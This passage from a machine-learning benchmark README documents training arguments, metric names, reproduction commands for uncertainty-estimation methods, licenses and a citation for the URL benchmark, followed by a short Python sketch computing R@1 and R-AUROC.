uncertainty method should work. * ```--unc_width``` If ```--unc-module=pred-net```, this gives the width of the 3-layer MLP to estimate uncertainties. * ```--ssl``` Set to ```False``` if you want to learn with supervised labels and to ```True``` if you want to learn from self-supervised contrastive pairs. Note that these result in different data formats, such that not all losses are compatible with all settings. Please refer to the example codes below. * ```--warmup-lr``` The fixed learning rate to use in the first epoch. Usually lower than the learning rate in later epochs. * ```--lr-base``` The learning rate in reference to a batchsize of 256. This will be increased/decreased automatically if you use a smaller or bigger total batchsize. The current learning rate will be printed in the log. * ```--sched``` Which learning rate scheduler to use. In the paper we use ```cosine``` annealing, but you may want to try out ```step```. * ```--batch-size``` How many samples to process at the same time. * ```--accumulation_steps``` How many batches to calculate before making one optimizer step. The accumulation steps times the batch size gives the final, effective batchsize. Loss scalers adjust to this automatically. 
* ```--epochs``` Number of epochs to train for on the upstream dataset. Since we automatically start from pretrained checkpoints, this is set to ```32``` by default.
* ```--seed``` For final results, we replicate each experiment on the seeds ```1, 2, 3```.
* ```--eval-metric``` Which metric to select the best epoch checkpoint by. We use ```avg_downstream_auroc_correct``` for the R-AUROC averaged across all downstream validation sets. These options are the internal keys of the results dictionaries, as further detailed below. Keep in mind that an ```eval_``` is prepended to the metric name internally, as we only allow metrics on the validation splits to be used as ```eval-metric```.
* ```--log-wandb``` We recommend setting this to ```True``` to log your results in W&B. Don't forget to log in with your API key.
* ```--data-dir``` Folder where ImageNet, or in general your upstream dataset, is stored.
* ```--data-dir-downstream``` Folder where **all** of CUB200, CARS196, SOP, CIFAR10H, ..., are stored, or whichever downstream and further downstream datasets you use.
* ```--soft-labels``` and ```--real-labels``` Links to your ImageNet-RealH ```raters.npz``` and ```real.json``` files.

---

## Metrics

**TL;DR:** The R@1 and R-AUROC metrics reported in the paper are internally named ```best_test_avg_downstream_r1``` and ```best_test_avg_downstream_auroc_correct```. During hyperparameter tuning, please use them on their validation sets, i.e., ```best_eval_avg_downstream_r1``` and ```best_eval_avg_downstream_auroc_correct```.

**Long answer:** All metrics are named as follows:

```
<best/current epoch>_<dataset>_<metric>
```

, e.g., ```best_eval_avg_downstream_auroc_correct``` or ```eval_r1```.

* ```<best/current epoch>``` We prepend a ```best_``` if the metric is computed on the best so-far epoch. The best epoch is chosen via ```--eval-metric```, see above. If nothing is prepended, this is just the metric of the current epoch.
* ```<dataset>``` gives which dataset and eval/test split the metric is computed on. Options are:
  * ```eval``` The validation set given in ```--dataset_eval```, which is usually just the same as the upstream loader, i.e., ```torch/imagenet``` or ```soft/imagenet```.
  * ```eval_avg_downstream``` The average across the validation sets of all downstream loaders. They are defined via ```--dataset-downstream```.
  * ```test_avg_downstream``` The average across the test sets of all downstream loaders. They are defined via ```--dataset-downstream```.
  * ```furthertest_avg_downstream``` The average across the test sets of all "further" downstream loaders. They are defined via ```--further-dataset-downstream```. This is essentially just a second set of datasets to test on.
  * ```eval_repr/cub```, ```test_repr/cub```, ```furthertest_soft/benthic```, ... The results on each individual dataset. This is done for all datasets in ```--dataset-downstream``` and ```--further-dataset-downstream```.
* ```<metric>``` Which metric we evaluate:
  * ```auroc_correct``` This is the R-AUROC from the paper main text. This is the main metric we focus on (a minimal computation sketch is given at the end of this README).
  * ```r1``` The R@1 from the paper main text. This is the second most important metric.
  * ```top1``` and ```top5``` The top-1 and top-5 accuracy of the classifier. This only makes sense on the upstream dataset (it is output as well for downstream datasets, just for modularity reasons).
  * ```croppedHasBiggerUnc``` How often a cropped version of an image has a higher uncertainty than the original version.
* ```rcorr_crop_unc``` Rank correlation between how much we cropped an image and high uncertainty the model outputs. _Use with care!_ This is only implemented in reference to previous works. This metric only makes sense if all images show a single object, such that the amount of cropping has a roughly equal effect across all images. ```croppedHasBiggerUnc``` fixes this issue and should be preferred. * ```rcorr_entropy``` The rank correlation with the entropy of human soft label distributions. Only available for ```soft/...``` datasets. * ```min_unc```, ```avg_unc```, and ```max_unc``` The minimum, average, and maximum uncertainties across the dataset. --- ## Reproducing our Implemented Methods Below are the calls to reproduce the URL benchmark results on all ten baseline approaches, both on ResNet and ViT backbones. They all use the best hyperparameters we found in our searches. All approaches in the paper were repeated on seeds 1, 2, and 3, which we do not show here for brevity. ### Cross Entropy ``` train.py --inv_temp=31.353232263344143 --loss=cross-entropy --lr-base=0.0027583475549166764 --model=resnet50 --unc-module=class-entropy --unc_start_value=0 ``` ``` train.py --img-size=256 --inv_temp=60.70635770117517 --loss=cross-entropy --lr-base=0.004954014361368407 --model=vit_medium_patch16_gap_256 --unc-module=class-entropy --unc_start_value=0 ``` ### InfoNCE InfoNCE requires ```--ssl=True```, and a lower batchsize, since we forward two self-supervised crops per image. ``` train.py --accumulation_steps=21 --batch-size=96 --inv_temp=15.182859908025058 --loss=infonce --lr-base=0.0004452562693472003 --model=resnet50 --ssl=True --unc-module=embed-norm --unc_start_value=0 ``` ``` train.py --accumulation_steps=21 --batch-size=96 --img-size=256 --inv_temp=20.82011649785067 --loss=infonce --lr-base=0.006246538808281836 --model=vit_medium_patch16_gap_256 --ssl=True --unc-module=embed-norm --unc_start_value=0 ``` ### MCInfoNCE MCInfoNCE requires ```--ssl=True```, and a lower batchsize, since we forward two self-supervised crops per image. The MC sampling MCInfoNCE adds over InfoNCE did not significantly impact runtime or memory usage. ``` train.py --accumulation_steps=21 --batch-size=96 --inv_temp=52.43117045513681 --loss=mcinfonce --lr-base=2.384205225724591e-05 --model=resnet50 --ssl=True --unc-module=pred-net --unc_start_value=0.001 --warmup-lr=3.487706876306753e-05 ``` ``` train.py --accumulation_steps=21 --batch-size=96 --img-size=256 --inv_temp=50.27568453131382 --loss=mcinfonce --lr-base=0.0031866603949435874 --model=vit_medium_patch16_gap_256 --ssl=True --unc-module=pred-net --unc_start_value=0.001 ``` ### Expected Likelihood Kernel (ELK) ``` train.py --inv_temp=27.685357549319253 --loss=elk --lr-base=0.008324452068209802 --model=resnet50 --unc-module=pred-net --unc_start_value=0 ``` ``` train.py --img-size=256 --inv_temp=56.77356863558765 --loss=elk --lr-base=0.009041687325778511 --model=vit_medium_patch16_gap_256 --unc-module=pred-net --unc_start_value=0 ``` ### Non-isotropic von Mises Fisher (nivMF) ``` train.py --inv_temp=10.896111351193488 --loss=nivmf --lr-base=0.00014942909398367403 --model=resnet50 --unc-module=pred-net --unc_start_value=0.001 ``` ``` train.py --img-size=256 --inv_temp=31.353232263344143 --loss=nivmf --lr-base=0.0027583475549166764 --model=vit_medium_patch16_gap_256 --unc-module=pred-net --unc_start_value=0.001 ``` ### Hedged Instance Embeddings (HIB) HIB has an additional hyperparameter ```--hib_add_const``` to shift its sigmoid. 
HIB requires lower batchsizes to prevent running out of VRAM. ``` train.py --accumulation_steps=21 --batch-size=96 --hib_add_const=2.043464396656407 --inv_temp=26.850376086478832 --loss=hib --lr-base=5.606607236666466e-05 --model=resnet50 --unc-module=pred-net --unc_start_value=0 --warmup-lr=2.2864937540918197e-06 ``` ``` train.py --accumulation_steps=43 --batch-size=48 --hib_add_const=-5.360730528719454 --img-size=256 --inv_temp=13.955844954616405 --loss=hib --lr-base=0.0005920448270870512 --model=vit_medium_patch16_gap_256 --unc-module=pred-net --unc_start_value=0 ``` ### Heteroscedastic Classifiers (HET-XL) HET-XL uses several hyperparameters, see the args in ```train.py```, most importantly the ```--rank_V``` of the covariance matrix and ```--c-mult```. HET-XL uses a standard cross-entropy loss, but a modified architecture, which you call via the ```--model``` argument. We've implemented this only for ResNet 50 and ViT Medium. It can also use either its covariance determinant or class entropy as ```--unc-module```. In our experiments, the latter outperformed the former. ``` train.py --c-mult=0.011311824684149863 --inv_temp=28.764754827923134 --loss=cross-entropy --lr-base=0.00030257136041070065 --model=resnet50hetxl --rank_V=1 --unc-module=class-entropy --unc_start_value=0 ``` ``` train.py --c-mult=0.011586882497402008 --img-size=256 --inv_temp=21.601079237861356 --loss=cross-entropy --lr-base=0.00012722151293115814 --model=vit_medium_patch16_gap_256hetxl --rank_V=1 --unc-module=hetxl-det --unc_start_value=0 ``` ### Direct Risk Prediction (Riskpred) Riskpred uses the ```--lambda-value``` hyperparameter to balance its cross entropy and uncertainty prediction loss. ``` train.py --inv_temp=27.538650119804444 --lambda-value=0.04137484664752506 --loss=riskpred --lr-base=0.00907673293373138 --model=resnet50 --unc-module=pred-net --unc_start_value=0 ``` ``` train.py --img-size=256 --inv_temp=29.83516046330469 --lambda-value=0.011424752423322174 --loss=riskpred --lr-base=0.0026590263551453507 --model=vit_medium_patch16_gap_256 --unc-module=pred-net --unc_start_value=0.001 ``` ### MCDropout Specify the number of MC samples to take via ```--num-heads``` and the dropout rate via ```--drop```. ``` train.py --drop=0.08702220252645132 --inv_temp=29.31590841184109 --loss=cross-entropy --lr-base=0.00016199535513680024 --model=resnet50dropout --unc-module=jsd --unc_start_value=0 ``` ``` train.py --drop=0.1334044009405148 --img-size=256 --inv_temp=57.13603169495254 --loss=cross-entropy --lr-base=0.0027583475549166764 --model=vit_medium_patch16_gap_256dropout --unc-module=class-entropy --unc_start_value=0 ``` ### Ensemble Specify the number heads via ```--num-heads```. This increases memory and computation usage. ``` train.py --inv_temp=29.89825063351814 --loss=cross-entropy --lr-base=0.004405890102835956 --model=resnet50 --num-heads=10 --unc-module=class-entropy --unc_start_value=0 ``` ``` train.py --img-size=256 --inv_temp=54.435826404570726 --loss=cross-entropy --lr-base=0.004944771531139904 --model=vit_medium_patch16_gap_256 --num-heads=10 --unc-module=class-entropy --unc_start_value=0 ``` ### Spectral-normalized Neural Gaussian Processes (SNGP/GP) SNGP has mutiple hyperparameters. Our implementation follows the defaults of the original paper. Most importantly, ```--use-spec-norm``` controls whether to use SNGP or drop the SN and only use GP. Like HET-XL, SNGP is called via a modified model architecture and otherwise uses a standard cross entropy loss. 
``` train.py --gp-cov-discount-factor=-1 --gp-input-normalization=True --loss=cross-entropy --lr-base=0.003935036929170965 --model=resnet50sngp --spec-norm-bound=3.0034958778109893 --unc-module=class-entropy --unc_start_value=0 --use-spec-norm=True ``` ``` train.py --gp-cov-discount-factor=0.999 --gp-input-normalization=True --img-size=256 --loss=cross-entropy --lr-base=0.0002973866135608272 --model=vit_medium_patch16_gap_256sngp --spec-norm-bound=2.0072013733952883 --unc-module=class-entropy --unc_start_value=0 --use-spec-norm=False ``` --- ## Licenses ### Code This repo bases largely on [timm](https://github.com/huggingface/pytorch-image-models) (Apache 2.0), with some dataloaders from [Revisiting Deep Metric Learning](https://github.com/Confusezius/Revisiting_Deep_Metric_Learning_PyTorch) (MIT Licence), and some methods from [Probabilistic Contrastive Learning](https://github.com/mkirchhof/Probabilistic_Contrastive_Learning) (MIT License). Several further methods are (re-)implemented by ourselves. Overall, this repo is thus under an Apache 2.0 License. That said, it is your responsibility to ensure you comply with licenses here and conditions of any dependent licenses. Where applicable, the sources/references for various components are linked in docstrings. ### Pretrained Weights So far all of the pretrained weights available here are pretrained on ImageNet with a select few that have some additional pretraining (see extra note below). ImageNet was released for non-commercial research purposes only (https://image-net.org/download). It's not clear what the implications of that are for the use of pretrained weights from that dataset. Any models I have trained with ImageNet are done for research purposes and one should assume that the original dataset license applies to the weights. It's best to seek legal advice if you intend to use the pretrained weights in a commercial product. #### Pretrained on more than ImageNet Several weights included or references here were pretrained with proprietary datasets that I do not have access to. These include the Facebook WSL, SSL, SWSL ResNe(Xt) and the Google Noisy Student EfficientNet models. The Facebook models have an explicit non-commercial license (CC-BY-NC 4.0, https://github.com/facebookresearch/semi-supervised-ImageNet1K-models, https://github.com/facebookresearch/WSL-Images). The Google models do not appear to have any restriction beyond the Apache 2.0 license (and ImageNet concerns). In either case, you should contact Facebook or Google with any questions. --- ## Citing ``` @article{kirchhof2023url, title={URL: A Representation Learning Benchmark for Transferable Uncertainty Estimates}, author={Michael Kirchhof and Bálint Mucsányi and Seong Joon Oh and Enkelejda Kasneci}, journal={arXiv preprint arXiv:2307.03810}, year={2023} } ``` If you use the benchmark, please also cite the datasets.
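As referenced in the metrics section, here is a minimal, self-contained sketch of how an R@1 / R-AUROC-style evaluation can be computed from embeddings, uncertainty estimates, and labels. It illustrates the metric definitions described above and is not the repository's actual implementation; the array names and the toy data are hypothetical.

```python
import numpy as np
from sklearn.metrics import roc_auc_score

def r1_and_r_auroc(embeddings: np.ndarray, uncertainties: np.ndarray, labels: np.ndarray):
    """R@1: does the 1-nearest neighbor (excluding self) share the query's label?
    R-AUROC: does higher predicted uncertainty indicate an incorrect retrieval?"""
    # cosine similarity on L2-normalized embeddings
    emb = embeddings / np.linalg.norm(embeddings, axis=1, keepdims=True)
    sim = emb @ emb.T
    np.fill_diagonal(sim, -np.inf)      # exclude self-matches
    nn = sim.argmax(axis=1)             # index of the nearest neighbor
    correct = labels[nn] == labels      # was the retrieval correct?
    r1 = correct.mean()
    # low uncertainty should accompany correct retrievals, so score with -uncertainty
    r_auroc = roc_auc_score(correct, -uncertainties)
    return r1, r_auroc

# toy usage with random data
rng = np.random.default_rng(0)
emb = rng.normal(size=(100, 16))
unc = rng.random(100)
lab = rng.integers(0, 5, size=100)
print(r1_and_r_auroc(emb, unc, lab))
```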
Dataset Card for "github_july_week1_2023"
